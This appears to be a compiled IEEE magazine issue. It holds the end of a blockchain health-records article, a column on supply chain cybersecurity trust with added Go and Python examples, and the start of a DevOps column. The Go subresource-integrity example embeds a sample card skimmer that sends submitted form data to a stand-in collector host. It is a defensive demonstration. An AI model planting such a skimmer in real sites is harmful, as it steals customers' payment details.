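The mechanics described above (only a record’s signature on the chain, every transaction signed by the right private key, the patient alone able to grant access, and an immutable log that anyone can audit) fit in a short program. The Go code below is an added example written for this edition; it is not MedRec’s code and follows no published MedRec interface. It assumes one in-memory, single-patient ledger standing in for a permissioned chain, Ed25519 keys for the patient and each provider, and that the record itself stays in an off-chain store the program does not model. Verify() rebuilds the access policy from the ledger alone, so an auditor holding nothing but the ledger and the patient’s public key can check the trail, and RecordMatches() is the “unaltered copy” check a provider runs on a retrieved record:

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"crypto/sha256"
	"fmt"
	"time"
)

// Actor is a participant (patient or provider); only its public key and signatures enter the ledger.
type Actor struct {
	Name string
	Pub  ed25519.PublicKey
	priv ed25519.PrivateKey
}
// NewActor makes an in-memory key pair, a stand-in for the patient's wallet or a provider HSM.
func NewActor(name string) Actor {
	pub, priv, _ := ed25519.GenerateKey(rand.Reader) // crypto/rand; the error path is not reachable in practice
	return Actor{Name: name, Pub: pub, priv: priv}
}

// Entry is one audit-trail record: no health data, only the hash of the off-chain record, who acted and when, the key granted (grant only), and a back-link.
type Entry struct {
	Timestamp  int64
	Action     string            // "create", "modify", or "grant"
	RecordHash [32]byte          // SHA-256 of the off-chain record (create/modify)
	Grantee    ed25519.PublicKey // provider key being authorized (grant only)
	Actor      string
	ActorPub   ed25519.PublicKey
	PrevHash   [32]byte // id() of the previous entry; zero for the first
	Sig        []byte   // Ed25519 signature over signedBytes()
}
// signedBytes is the canonical byte string the signature covers.
func (e Entry) signedBytes() []byte {
	return []byte(fmt.Sprintf("%d|%s|%x|%x|%s|%x|%x",
		e.Timestamp, e.Action, e.RecordHash, e.Grantee, e.Actor, e.ActorPub, e.PrevHash))
}
// id hashes the entry with its signature; the next entry's PrevHash must equal it.
func (e Entry) id() [32]byte { return sha256.Sum256(append(e.signedBytes(), e.Sig...)) }

// Ledger is one patient's append-only chain; OwnerPub is the patient's public key.
type Ledger struct {
	OwnerPub ed25519.PublicKey
	Entries  []Entry
}
// Verify re-checks every link and signature and replays the access policy from the ledger alone: create and grant need the patient's key; modify needs a key granted earlier in the chain.
func (l *Ledger) Verify() error {
	allowed := map[string]bool{string(l.OwnerPub): true}
	var prev [32]byte
	for i, e := range l.Entries {
		if e.PrevHash != prev || !ed25519.Verify(e.ActorPub, e.signedBytes(), e.Sig) {
			return fmt.Errorf("entry %d: broken link or bad signature (%s by %s)", i, e.Action, e.Actor)
		}
		ok := e.Action == "modify" && allowed[string(e.ActorPub)] ||
			(e.Action == "create" || e.Action == "grant") && e.ActorPub.Equal(l.OwnerPub)
		if !ok {
			return fmt.Errorf("entry %d: %s by %s not authorized", i, e.Action, e.Actor)
		}
		if e.Action == "grant" {
			allowed[string(e.Grantee)] = true
		}
		prev = e.id()
	}
	return nil
}

// Append signs a new entry and keeps it only if the extended chain still verifies (O(n) per append, fine for a demonstration); a rejected entry is rolled back.
func (l *Ledger) Append(by Actor, action string, grantee ed25519.PublicKey, record []byte) error {
	e := Entry{Timestamp: time.Now().Unix(), Action: action, RecordHash: sha256.Sum256(record),
		Grantee: grantee, Actor: by.Name, ActorPub: by.Pub}
	if n := len(l.Entries); n > 0 {
		e.PrevHash = l.Entries[n-1].id()
	}
	e.Sig = ed25519.Sign(by.priv, e.signedBytes())
	l.Entries = append(l.Entries, e)
	if err := l.Verify(); err != nil {
		l.Entries = l.Entries[:len(l.Entries)-1]
		return err
	}
	return nil
}

// RecordMatches is the "unaltered copy" check: does an off-chain copy hash to the value anchored by the latest create or modify entry?
func (l *Ledger) RecordMatches(record []byte) bool {
	for i := len(l.Entries) - 1; i >= 0; i-- {
		if a := l.Entries[i].Action; a == "create" || a == "modify" {
			return l.Entries[i].RecordHash == sha256.Sum256(record)
		}
	}
	return false
}

func main() {
	patient, hospital, insurer := NewActor("alice"), NewActor("general-hospital"), NewActor("insurer")
	l, rec := &Ledger{OwnerPub: patient.Pub}, []byte(`{"patient":"alice","allergies":["penicillin"]}`) // constructed record, kept off-chain
	fmt.Println(l.Append(patient, "create", nil, rec), l.Append(patient, "grant", hospital.Pub, nil))
	fmt.Println(l.Append(hospital, "modify", nil, rec), l.Append(insurer, "modify", nil, rec)) // nil, then an error
	fmt.Println(l.Verify(), l.RecordMatches(rec), l.RecordMatches([]byte("altered copy")))   // nil true false
}
```

Run it and the insurer’s attempt to modify without a grant is refused and rolled back, a copy whose contents differ from the anchored hash fails RecordMatches(), and changing any field of a stored entry breaks its signature or the next entry’s back-link. What the example leaves out matters as much: the record is not encrypted here, and a stolen or lost patient key has no recovery path, which is the flip side of “only the patient has the private key.”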

Ensuring that healthcare providers authorize the right person, and only the right person, is a challenge for implementing blockchain-based models in EHRs in most countries. By adopting a unique digital ID for the identification and authentication of patients, nations can achieve a higher degree of effectiveness for such models. By doing so, they can also improve the quality of healthcare, reduce insurance fraud, and enhance administrative efficiency.8

The bottom row in Table 1 shows how blockchain reduces inefficiency. A key benefit of blockchain-based EHRs is that there is no entity between the patient and his or her medical records. Moreover, there is no need to create custom functionality for each EHR vendor.4 In the previous example, a patient’s treatment will not be delayed simply because medical information sent from a service provider to a hospital was not received; patients can securely share this information with different providers throughout their lifetimes.4 If there is any change in the patient’s condition, the data related to these changes are communicated to the ledger by authorized parties.9 Thus, timely access to accurate and up-to-date information should improve the efficiency of patient care.

BLOCKCHAIN CHALLENGES

There are challenges and limitations facing blockchain’s management of EHRs. The main barriers to introducing blockchain may be educational rather than technical (http://www.economist.com/news/business/21722869-anti-establishment-technology-faces-ironic-turn-fortune-governments-may-be-big-backers). There has been a general lack of awareness of blockchain’s benefits to the medical field.

There are also control- and ownership-related factors, i.e., healthcare providers may encounter barriers that prevent them from moving to blockchain. The psychological challenges healthcare organizations face must be recognized and dealt with so that concerns related to privacy, security, and integrity are addressed. The current mindset among many healthcare providers is that they are the only “steward” of patient data in their respective organizations.9 It might be difficult to change this culture, but evidence suggests it is necessary. Additionally, not all individuals are in a position to handle their medical data themselves; e.g., older persons or patients with mental illness and dementia may be unable to utilize blockchain to hold ownership and ultimate control over their information.

Furthermore, there are EHR privacy laws such as the Health Insurance Portability and Accountability Act of 1996 that must be enforced (https://tinyurl.com/ydcllwzz). As mentioned previously, blockchain’s transparency is not always conducive to privacy. We believe, however, that when appropriate encryption is used for the actual hard patient data and proper control is applied to a specific patient’s chain, these two competing forms of trust can occur simultaneously.

There are also scalability challenges, because the volume of medical records keeps growing. If the records themselves are written to the chain, every node that participates in the network must store a copy of every patient’s complete medical records, which creates data-storage and bandwidth problems.10 This is why designs such as MedRec keep the records off-chain and anchor only their signatures in the ledger; the price is that the off-chain store becomes a component whose availability and access control must be secured separately.

LOOKING FORWARD

All access to healthcare data should be monitored and logged, and unmonitored access to identifiable information should be prohibited. It may not be realistic or feasible to achieve this goal for current EHR models yet. In many healthcare organizations, mechanisms do not exist to ensure that patient data are not accessed by unauthorized users, and current EHR infrastructure may not meet patient privacy requirements.

These challenges may be addressed with blockchain, which can address the broader problem of systems relying on password-based security and authentication. The blockchain ledger includes an audit trail and data that are time-stamped, which allows the patient to know (within reason) who made what changes and when. Third parties such as healthcare providers can see patient data with the patient’s permission, but they are not required or expected to store the data. In this way, a blockchain-based model is superior to existing data-governance models.

In recent years, significant initiatives have been undertaken in a range of settings that use blockchain to strengthen the security and privacy of healthcare data. The main focus of many of those initiatives has been on audit trails. Blockchain may also lead to more efficient healthcare practices by addressing existing inefficiencies that cause lost time, poorer care, and higher costs.

ACKNOWLEDGMENT I thank Jeff Voas for his contributions to this article.

REFERENCES

1. D. Munro, “Data breaches in healthcare totaled over 112 million records in 2015,” 2015. [Online]. Available: https://www.forbes.com/sites/danmunro/2015/12/31/data-breaches-in-healthcare-total-over-112-million-records-in-2015/#5a1974687b07

2. F. Bazzoli, “FDA, IBM Watson Health to study application of blockchain technology,” 2017. [Online]. Available: https://www.healthdatamanagement.com/news/fda-ibm-watson-health-to-study-application-of-blockchain-technology

3. A. W. Mathews and D. Yadron, “Health insurer Anthem hit by hackers,” 2015. [Online]. Available: https://www.wsj.com/articles/health-insurer-anthem-hit-by-hackers-1423103720

4. J. D. Halamka, A. Lippman, and A. Ekblaw, “The potential for blockchain to transform electronic health records,” 2017. [Online]. Available: https://hbr.org/2017/03/the-potential-for-blockchain-to-transform-electronic-health-records

5. P. M. Schwartz and D. J. Solove, “The PII problem: Privacy and a new concept of personally identifiable information,” New York Univ. Law Rev., vol. 86, pp. 1814–1894, 2011.

6. H. de Koning, J. P. Verver, J. van den Heuvel, S. Bisgaard, and R. J. Does, “Lean Six Sigma in healthcare,” J. Healthcare Quality, vol. 28, no. 2, pp. 4–11, 2006.

7. A. Ekblaw, A. Azaria, J. D. Halamka, and A. Lippman, “A case study for blockchain in healthcare: ‘MedRec’ prototype for electronic health records and medical research data,” MIT Media Lab and Beth Israel Deaconess Med. Center, Boston, MA, White Paper, 2016.

8. The World Bank, “The role of digital identification for healthcare: The emerging use cases,” Washington, D.C., 2018. [Online]. Available: http://pubdocs.worldbank.org/en/595741519657604541/DigitalIdentification-HealthcareReportFinal.pdf

9. L. Silverman, “How bitcoin technology could securely share medical records among your doctors,” 2017. [Online]. Available: http://keranews.org/post/how-bitcoin-technology-could-securely-share-medical-records-among-your-doctors

10. L. A. Linn and M. B. Koo, “Blockchain for health data and its potential use in health IT and healthcare-related research,” 2016. [Online]. Available: https://www.healthit.gov/sites/default/files/11-74-ablockchainforhealthcare.pdf

NIR KSHETRI is a professor of management at the Bryan School of Business and Economics at the University of North Carolina at Greensboro. Contact him at [email protected] .


Organizations increasingly share data, credentials, software code, applications, networks, and infrastructures with “trusted” supply chain partners. Supply chains can be sources of cyber-vulnerabilities. One estimate has suggested that supply chains account for 80% of all cyber breaches (https://www.industryweek.com/supply-chain/can-t-turn-back-time-cybersecurity-must-be-dealt). Insecure supply chains have fostered well-known cyberattacks.

In a quest to break large organizations’ networks, cyber-criminals may look beyond the first-tier supply chain partners. According to Accenture’s Cyber Threatscape Report (2018), hackers have an increased focus on exploiting third- and fourth-party supply chain partners to infiltrate large organizations.1 Another trend has been attacks on hardware products via backdoors and with malware insertion.2

VULNERABILITIES AND EXPLOITS

Supply chains are vulnerable and subject to exploitation. Table 1 provides examples.

Consider software development. By attacking smaller software providers, hackers have been able to infiltrate larger organizations that rely on their software. For example, in the British Airways (BA) case, hackers attacked third-party code that ran payment authorization by injecting their own malicious code into it. This meant that the hackers did not need to access or penetrate BA networks.4 The hackers also obtained CVV numbers; however, BA reported that it had not stored the CVV numbers. This suggests that the CVV numbers were intercepted when transactions occurred, in the customer’s browser as the payment form was submitted (https://www.bbc.com/news/uk-england-london-45440850). According to the cybersecurity company RiskIQ, the BA hackers employed a “cross-site scripting” attack. In such attacks, criminals exploit a third-party website to launch cyberattacks against other entities.
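The practitioner’s countermeasure for the BA pattern is to pin the hash of the reviewed vendor script in the page (the integrity attribute, known as subresource integrity) so the browser refuses any modified copy. The article does not cover it, so the Go program below is an added example and not code from RiskIQ, BA, or the authors. It computes the pin for a constructed script and then re-runs the browser’s comparison against the same script with a skimmer appended; the script bodies and the collector host are made up for the demonstration:

```go
package main

import (
	"crypto/sha512"
	"crypto/subtle"
	"encoding/base64"
	"fmt"
	"strings"
)

// IntegrityFor computes the value a site pins in
// <script src="https://vendor.example/pay.js" integrity="sha384-..."> for a script body it has
// reviewed. SHA-384 is one of the digests (sha256/sha384/sha512) browsers accept for subresource integrity.
func IntegrityFor(script []byte) string {
	sum := sha512.Sum384(script)
	return "sha384-" + base64.StdEncoding.EncodeToString(sum[:])
}

// VerifyIntegrity mirrors the browser's check: the fetched body must hash to the pinned value or the
// script is refused. A malformed pin, or one using an algorithm this checker does not accept, fails closed.
func VerifyIntegrity(pin string, fetched []byte) bool {
	algo, encoded, ok := strings.Cut(pin, "-")
	if !ok || algo != "sha384" {
		return false
	}
	want, err := base64.StdEncoding.DecodeString(encoded)
	if err != nil {
		return false
	}
	got := sha512.Sum384(fetched)
	return subtle.ConstantTimeCompare(want, got[:]) == 1
}

// Constructed sample: the vendor's payment script as it was when the site owner reviewed it.
var reviewedScript = []byte(`function pay(form){return fetch('/api/pay',{method:'POST',body:new FormData(form)})}`)

// The same script after a skimmer is appended at the vendor. It copies the card form, CVV included,
// to a hypothetical attacker host as the form is submitted, which is why the merchant can truthfully
// say it never stored the CVV.
var skimmedScript = append(append([]byte{}, reviewedScript...),
	[]byte(`;document.addEventListener('submit',e=>navigator.sendBeacon('https://collector.invalid/c',new FormData(e.target)))`)...)

func main() {
	pin := IntegrityFor(reviewedScript)
	fmt.Println("pinned:", pin)
	fmt.Println("reviewed script accepted:", VerifyIntegrity(pin, reviewedScript))
	fmt.Println("skimmed script accepted:", VerifyIntegrity(pin, skimmedScript))
	fmt.Println("unsupported algorithm accepted:", VerifyIntegrity("sha1-"+strings.TrimPrefix(pin, "sha384-"), reviewedScript))
}
```

The check only holds while the reviewed script is what is pinned: every legitimate vendor update changes the hash and needs a new pin, which is the operational cost of the control, and it does nothing for scripts the page loads dynamically without an integrity attribute or for a compromise of the merchant’s own origin. Limiting where the page may send data, through a Content Security Policy, covers the exfiltration side that the pin does not.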

Nation-states can also exploit supply chains for spying. For example, according to the cybersecurity company Area 1, several nations may have collaborated to launch a cyberattack on the Saudi oil company Aramco in 2017 (https://foreignpolicy.com/2017/12/21/cyber-attack-targets-safety-system-at-saudi-aramco/).

CHALLENGES

Challenges exist in securing supply chains. For example, companies may assign a lower priority to supply chain risks than other types of risks. A survey conducted among the members of Consumer Packaged Goods Vertical Strategy Group revealed that while 100% of the respondents assessed IT risks, only 75% assessed supply chain risks. Likewise, only 75% considered minimizing supply chain cyber risks as a third-party risk management goal.3 Furthermore, although most organizations conduct annual risk assessments, those may be insufficient to deal with the challenges facing supply chains (https://thehill.com/blogs/congress-blog/technology/403958-washington-to-finally-focus-on-threat-to-supply-chain-risk).

Trust in any supply chain is a complex problem that is hard to measure and achieve. Supply chains of large organizations are often complicated and involve large numbers of partners and products. For example, one cybersecurity firm noted that one of its client’s supply chains involved more than 5000 companies (https://finfeed.com/small-caps/technology/british-airways-data-breach-throws-whitehawks-us-government-contract-into-light/). Thus, it is challenging to monitor supply chains with so many stakeholders involved, particularly in real time. A survey found that 72% of companies lacked full visibility into their supply chains.4

While the problem has been recognized since the 1970s, the severity of this issue is compounded by the rapid internationalization of technology and the global division of labor (https://krebsonsecurity.com/2018/10/supply-chain-security-101-an-experts-view/). Simply blocking foreign companies from being dominant suppliers may not be effective. For example, China controls a large proportion of the global supply chain, yet that offers no guarantee that its products have security built in, since those products may be designed in other countries (https://www.nytimes.com/2018/10/12/technology/the-week-in-tech-fears-of-the-supply-chain-in-china.html).

COLUMN: IT TRENDS

Supply Chain Trust
Nir Kshetri, University of North Carolina at Greensboro
Jeffrey Voas, Fellow, IEEE

This article originally appeared in IT Professional, vol. 21, no. 2, 2019. Digital Object Identifier 10.1109/MITP.2019.2895423. Date of current version 27 March 2019.

In some countries, electronic components produced in those countries are sold by various “white label” firms. If security flaws are identified in components that were “white labeled,” it may be difficult to know which companies white-labeled a specific component, and it will be difficult to inform consumers about these flaws. In another scenario, when a security hole is found in a specific vendor product, that vendor may simply go out of business and restart under a different name (https://krebsonsecurity.com/2018/10/supply-chain-security-is-the-whole-enchilada-but-whos-willing-to-pay-for-it/). And when white-labeling occurs, the original manufacturer may have little incentive to increase trust in their products beyond what the rebranding companies require.

Another problem is related to the lack of regulatory and enforcement mechanisms. Some government methods for monitoring supply chain trust focus more on preventing counterfeit products than on espionage activities (https://www.techrepublic.com/article/5-tips-to-secure-your-supply-chain-from-cyberattacks/).

And finally, consumers are often more interested in price and functionality. Increased security often makes devices slower and more expensive. Moreover, security flaws may not directly affect device owners but affect others. Even if owners know that their devices are being used to launch cyberattacks, the end victims are often unknown. Manufacturers have few incentives to make more secure devices until customers demand it.

POSSIBLE APPROACHES

Table 2 presents four potential avenues for enhancing supply chain security and trust.

Governments

Regulatory measures are one approach intended to increase supply chain trust. Efforts to do this have already been undertaken. In September 2018, the Trump Administration released a National Cybersecurity Strategy that requires federal agencies to invest in more secure supply chain technologies (Feldman, 2018).5

There have also been attempts to introduce formal legislation to increase trust in supply chains. In September 2018, the U.S. Senate Homeland Security and Governmental Affairs Committee approved the Federal Acquisition Supply Chain Security Act. The Act is intended to improve information sharing within the intelligence community. It also establishes an inter-agency process to exclude companies from contracting with the federal government if it is deemed that they may pose threats to the federal supply chain.6

Organization | Reported in | Supply chain partner compromised | Effect
Equifax | 2017 | Flaws in the enterprise platform (https://www.wired.com/story/equifax-breach-no-excuse/) that collected website performance data and served malicious content (http://www.latimes.com/business/la-fi-equifax-social-security-numbers-20171012-story.html). | 143 million people
British Airways | September 2018 | Third-party software code used to run payment authorization. | 380 000 customers
Ticketmaster | Early 2018 | Customer-service chatbot supplied by a third party (https://www.bbc.co.uk/news/technology-44642567). | 40 000 U.K. users
Target | December 2013 | Started with stealing credentials of Target’s HVAC vendor (https://www.csoonline.com/article/2601021/security0/11-steps-attackers-took-to-crack-target.html). The hackers then used the stolen credentials to gain access to Target-hosted web services that were dedicated to vendors. | 40 million credit and debit-card accounts and 70 million people

TABLE 1. Examples of cyberattacks involving supply chain partners.


Government agencies have also taken steps to increase awareness of supply chain risks by providing guidelines to strengthen security. In 2013, the U.S. Department of Homeland Security (DHS) released guidelines that outline device manufacturers’ roles and obligations related to IoT security. DHS urged companies producing IoT products to “build security in” at the design phase.

Government stakeholders can also consider teaming with private sector stakeholders to monitor vulnerabilities and share relevant information. This could lead to greater awareness and recognition of supply chain cyber-threats (https://www.weforum.org/agenda/2018/06/managing-risk-in-the-energy-sector-s-cyber-supply-chain). A recent report by MITRE on securing the U.S. Pentagon's cyber supply chain recommended the establishment of a National Supply Chain Intelligence Center. The report recommended that the Center be co-led by civilian and military agencies (https://advance.lexis.com/api/document?collection=news&id=urn:contentItem:5TG6-7771-JBHM-S2HW-00000-00&context=1516831).

Industry and Trade Associations

Industry groups and trade associations may also be able to play a role here.

One example of this occurred in January 2017, when a group including Cisco, Bosch, Bank of New York Mellon, Foxconn, Dutch cybersecurity company Gemalto, and other blockchain startups came together to develop a team that plans to establish blockchain protocols for IoT devices, applications, and networks (bit.ly/2kNtm7w).

Note that blockchain has the potential to strengthen supply chain trust. Blockchain can facilitate handling crisis situations such as product recalls. Blockchain's public transparency offers traceability, allowing a backward trace from a final product to the origin of its raw materials. Furthermore, transactions recorded in blocks might be able to predict and identify the end-users of vulnerable products.

The reason that blockchain holds promise here is that the blocks can register the time of transaction, the location of transaction, price, parties involved, and other information as an item changes ownership and moves through a workflow or manufacturing process. Blockchain's distributed ledger technology can also track raw materials as they move through a supply chain over time. Blockchain can also register updates, patches, and part replacements applied to end-products throughout their lifetime. This offers tracking of vulnerabilities and notifications for end-users.
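To make the mechanism concrete, here is an added example (not part of the article) of a minimal hash-chained ledger in Python: each block records the time, location, price, parties and event for an item; the chain detects tampering with any earlier record; and two queries perform the backward trace from a product to its raw materials and the forward trace from a part later reported vulnerable to the end-users holding products built from it. All item names, parties, prices and dates are constructed.

```python
from __future__ import annotations

import hashlib
import json
from dataclasses import dataclass

GENESIS = "0" * 64  # "previous hash" of the first block


@dataclass(frozen=True)
class Block:
    index: int
    prev_hash: str
    record: dict  # time, location, price, parties, item, event, components, ...
    hash: str


class SupplyChainLedger:
    """Append-only chain of blocks; each block commits to its predecessor's hash."""

    def __init__(self) -> None:
        self.chain: list[Block] = []

    @staticmethod
    def _digest(index: int, prev_hash: str, record: dict) -> str:
        payload = json.dumps({"i": index, "p": prev_hash, "r": record}, sort_keys=True)
        return hashlib.sha256(payload.encode()).hexdigest()

    def append(self, **record) -> Block:
        prev = self.chain[-1].hash if self.chain else GENESIS
        index = len(self.chain)
        block = Block(index, prev, record, self._digest(index, prev, record))
        self.chain.append(block)
        return block

    def verify(self) -> bool:
        """True only if every block still matches its hash and its link to the one before."""
        prev = GENESIS
        for i, b in enumerate(self.chain):
            if b.index != i or b.prev_hash != prev or b.hash != self._digest(i, prev, b.record):
                return False
            prev = b.hash
        return True

    def trace_back(self, item: str) -> list[str]:
        """Backward trace: the item plus, transitively, every component it was made from."""
        origins, todo = [], [item]
        while todo:
            cur = todo.pop()
            if cur in origins:
                continue
            origins.append(cur)
            for b in self.chain:
                if b.record.get("item") == cur:
                    todo.extend(b.record.get("components", []))
        return origins

    def affected_products(self, part: str) -> set[str]:
        """Forward trace: every item assembled, directly or indirectly, from `part`."""
        affected, todo = set(), [part]
        while todo:
            cur = todo.pop()
            for b in self.chain:
                if cur in b.record.get("components", []) and b.record["item"] not in affected:
                    affected.add(b.record["item"])
                    todo.append(b.record["item"])
        return affected

    def current_holder(self, item: str) -> str | None:
        # Receiving party of the item's most recent ownership-changing event.
        holder = None
        for b in self.chain:
            if b.record.get("item") == item and "to" in b.record:
                holder = b.record["to"]
        return holder

    def end_users_to_notify(self, vulnerable_part: str) -> dict[str, str | None]:
        # Each end product containing the part, mapped to whoever holds it now.
        return {p: self.current_holder(p) for p in self.affected_products(vulnerable_part)}

    def patch_history(self, item: str) -> list[str]:
        # Patch versions recorded against an item over its lifetime.
        return [b.record["version"] for b in self.chain
                if b.record.get("item") == item and b.record.get("event") == "patch"]


def build_demo_ledger() -> SupplyChainLedger:
    """Constructed sample history: one camera assembled from a battery cell and an MCU."""
    ledger = SupplyChainLedger()
    ledger.append(time="2019-03-01", location="Mine A", price=100, sender="Mine A",
                  to="Refiner B", item="lithium-lot-1", event="shipment")
    ledger.append(time="2019-04-10", location="Plant C", price=12, sender="Refiner B",
                  to="Plant C", item="cell-7", event="manufacture", components=["lithium-lot-1"])
    ledger.append(time="2019-05-02", location="Assembler E", price=80, sender="Assembler E",
                  to="Retailer F", item="camera-42", event="assembly", components=["cell-7", "mcu-9"])
    ledger.append(time="2019-06-15", location="Retailer F", price=129, sender="Retailer F",
                  to="customer-001", item="camera-42", event="sale")
    # A later firmware fix for the MCU is recorded on the same chain (no ownership change).
    ledger.append(time="2020-01-20", location="remote", price=0, issuer="Fab D",
                  item="mcu-9", event="patch", version="fw-1.1")
    return ledger
```

Mutating any earlier block's record (for example, changing a recorded price) makes `verify()` return False, which is the audit-trail property the text relies on.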

MANUFACTURERS AND SERVICE PROVIDERS

Manufacturers and service providers can leverage their buying power to strengthen trust in supply chains. How? They can evaluate the security practices of supply chain partners and insist that applicable security standards are followed. Furthermore, compliance can sometimes be mandated through contracts (https://www.cbronline.com/solutions/us-organisations-not-battle-ready-in-war-against-cybercrime-4280918/); however, determining compliance is often elusive.

Level | Mechanisms | Examples/Remarks
National/state | Increasing investment in technological and human capabilities. Introducing formal legislation to secure supply chains. Increasing awareness of supply chain risks and providing guidelines to strengthen security. | The U.S.: National Cybersecurity Strategy requires federal agencies to invest more in secure supply chain technologies. The Federal Acquisition Supply Chain Security Act. DHS guidelines that outline device manufacturers’ roles and obligations surrounding IoT security.
Industry group/trade association | Fill the regulatory vacuum. Resource and expertise advantages. | Diverse networking, engineering, financial, electronics, cybersecurity, and blockchain businesses team to develop blockchain functionality to improve supply chain trust.
Manufacturers and service providers | Purchasing power. Ensure that supply chain partners follow security standards. Continuously monitor supply chain cyber risks. Develop and implement new ways to assess and deal with supply chain risks. | Organizations employ Cyber Risk Frameworks to identify risks associated with sub-contractors.
Consumers | Changing consumer mindset to require vendors to follow responsible security practices. |

TABLE 2. Possible measures at various levels to secure supply chains.

Manufacturers and service providers may also consider developing new ways to assess and mitigate supply chain risks. For example, artificial intelligence and machine learning may be able to fight specific types of malware attacks in software supply chains. Over time, such tools “learn” to detect unusual patterns in various supply chain environments (http://www.cioandleader.com/article/2018/02/22/india-invest-heavily-ai-based-tools-counter-cyber-attacks-cisco). IBM's AI platform, Watson, is being used to provide predictive analytics to minimize disruptions and risks (https://www.forbes.com/sites/andrewarnold/2018/05/26/how-the-internet-of-things-impacts-supply-chain/).

Solutions that focus on risks associated with supply chain partners, subcontractors, and vendors can also be employed. WhiteHawk's 360 Risk Framework evaluates software vendors and service providers. The first customer of WhiteHawk's product was a U.S.-based financial institution whose goal was to identify the institution's exposure to cybersecurity risks induced by its 50 most important subcontractors. The identified subcontractors were expected to address their cyber risks (https://finfeed.com/small-caps/technology/whitehawk-wins-us325k-first-sale-cyber-risk-product/).

And finally, it may be useful to contract for external services that will continuously monitor the cyber risks associated with third-party vendors (https://threatpost.com/five-weakest-links-in-cybersecurity-that-target-the-supply-chain/137453/). Realize that if only an annual risk assessment is performed, security problems may be discovered too late for mitigation and after damage occurs. More frequent assessments should provide a fuller picture of supply chain risks so that more timely mitigation measures can be applied.

CONSUMERS

Consumer buying power can also be leveraged to strengthen supply chain trust. For instance, consumers could add pressure to manufacturers to incorporate security “best practices” into development life cycles. If consumers demanded more secure products and services, manufacturers might be more likely to source their components from contractors with known and demonstrated levels of security.

An encouraging trend here involves consumer mindset. Recent surveys have suggested that consumers expect businesses to follow responsible security practices. According to the RSA Data Privacy & Security Report, which was based on a survey of 7500 consumers in France, Germany, Italy, the UK, and the U.S., 62% of the respondents said that they would blame the company, not the hacker, if their data is breached.7 Likewise, a survey of 1000 U.K. consumers commissioned by FireEye indicated that 72% of consumers would stop purchasing from a company if a security breach was found to be linked to the company's failure to prioritize security and privacy (http://www.itproportal.com/2016/05/11/high-profile-data-breaches-affecting-consumer-trust-in-big-brands/).

SUMMARY

Supply chains are increasingly vulnerable and threatened. Trust in supply chains is a difficult proposition. Adversaries can inject malware and other malicious defects anytime during manufacturing and design. And it is hard to assess trust for international supply chains.

The problem of trusting supply chains is unlikely to go away soon. It is an analogous problem to that of drug smuggling—smugglers continue to find new ways to hide their illegal products during transport while law enforcement tries to catch up.

So, in closing, let us revisit our title: Supply Chain Trust, a topic that is both timely and timeless. Is trust here possible? “Yes,” but with caveats, and probably many.

DISCLAIMER

The authors are completely responsible for the content in this paper. The opinions expressed here are completely their own.

REFERENCES

1. J. Ray et al., “Cyber threatscape report 2018,” 2018. Available: https://www.accenture.com/gb-en/insights/security/cyber-threatscape-report-2018


2. L. Newman, “There’s no good fix if the supply chain gets hacked,” 2018. Available: https://www.wired.com/story/supply-chain-hacks-cybersecurity-worst-case-scenario/

3. PCU, “Consumer packaged goods sector needs decisive, unified action in the face of third party risks,” Plus Company Updates (PCU), Oct. 3, 2018. Available: https://advance.lexis.com/api/document?collection=news&id=urn:contentItem:5TD9-23N1-J9XT-P0J4-00000-00&context=1516831

4. P. Myerson, “Can’t turn back time: Cybersecurity must be dealt with,” Ind. Week, Jan. 2017. Available: https://www.industryweek.com/supply-chain/can-t-turn-back-time-cybersecurity-must-be-dealt

5. V. Feldman, “Trump administration moves to address cybersecurity concerns, congress funds cyber programs,” Nat. Law Rev., 2018. Retrieved from Nexis Uni.

6. “Senate Panel Clears Supply-Chain Bill Intended To ‘Bridge’ Gaps With DOD,” Inside Pentagon, Oct. 4, 2018. Available: https://advance.lexis.com/api/document?collection=news&id=urn:contentItem:5TDG-6NR1-DY0P-G376-00000-00&context=1516831

7. M. Nadeau, “General data protection regulation (GDPR) requirements, deadlines and facts,” 2018. Available: https://www.csoonline.com/article/3202771/data-protection/general-data-protection-regulation-gdpr-requirements-deadlines-and-facts.html

NIR KSHETRI is a Professor of management with the Bryan School of Business and Economics, the University of North Carolina at Greensboro, Greensboro, NC, USA. Contact him at [email protected].

JEFFREY VOAS was a Cofounder of Cigital, is Computer’s Cybertrust column editor, and is an IEEE Fellow. Contact him at [email protected].

IEEE Computer Graphics and Applications bridges the theory and practice of computer graphics. Subscribe to CG&A and

• stay current on the latest tools and applications and gain invaluable practical and research knowledge,

• discover cutting-edge applications and learn more about the latest techniques, and

• benefit from CG&A’s active and connected editorial board.



IEEE INTERNATIONAL SYMPOSIUM ON HARDWARE-ORIENTED SECURITY AND TRUST


REGISTER NOW: www.hostsymposium.org

6–9 Dec. 2020 • San Jose, CA, USA • DoubleTree by Hilton

Join dedicated professionals at the IEEE International Symposium on Hardware Oriented Security and Trust (HOST) for an in-depth look into hardware-based security research and development.

Key Topics:

• Semiconductor design, test and failure analysis

• Computer architecture

• Systems security

• Cryptography and cryptanalysis

• Imaging and microscopy

Discover innovations from outside your sphere of influence at HOST. Learn about new research that is critical to your future projects. Meet face-to-face with researchers and experts for inspiration, solutions, and practical ideas you can put to use immediately.


48 August 2020 Published by the IEEE Computer Society 2469-7087/20 © 2020 IEEE

EDITOR: Mik Kersten, Tasktop, [email protected]

DEPARTMENT: ON DEVOPS

To Transform to Have Agility, Don’t Do a Capital A, Capital T Agile Transformation

Jonathan Smart

Historically, in large, old, complex organizations (the horses rather than the unicorns) that have adopted agile and DevOps principles and practices, the adoption has been at the team level. From my experience of delivering software with agile principles since the early 1990s, these “islands of agile” most often arise despite the firm, not because of the firm, owing to employees with a growth mind-set willing to take a personal risk.

The agile islands are a local optimization in the end-to-end value stream. A 90 percent reduction in a development team’s lead time might have a negligible impact on the time from when customer needs are identified to when those needs are met. Look to the right, the constraint could be IT operations staff, who are incentivized to protect uptime, batching up change. Look to the left, the constraint is the portfolio management and funding black hole, with an annual cycle. Look up, there’s a command-and-control leadership style, with low levels of psychological safety. Look around, other teams aren’t agile and dependencies aren’t broken, such that the end-to-end lead time for customer value doesn’t decrease.

This article originally appeared in vol. 35, no. 6, 2018

FROM THE EDITOR

